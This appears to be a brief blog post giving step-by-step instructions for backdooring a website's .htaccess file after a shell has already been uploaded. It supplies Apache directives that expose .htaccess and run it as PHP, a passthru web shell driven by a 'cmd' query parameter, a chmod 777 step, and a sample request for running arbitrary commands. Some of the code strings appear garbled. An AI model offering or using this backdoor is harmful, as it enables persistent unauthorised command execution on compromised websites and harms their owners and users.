How to backdoor .htaccess file of a website .
Lets assume that you have alrdy the Website and have uploaded the shell .
Now ,
1. Add the below to the .htaccess file and change permission to 777 (chmod 777)
:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType appliion/x-httpd-p .htaccess
# <?p passthru($_GET['cmd']); ?>
2. Now go to :
site.com/.htaccess?cmd=ls
after = you can run a command of your choice
No comments:
Post a Comment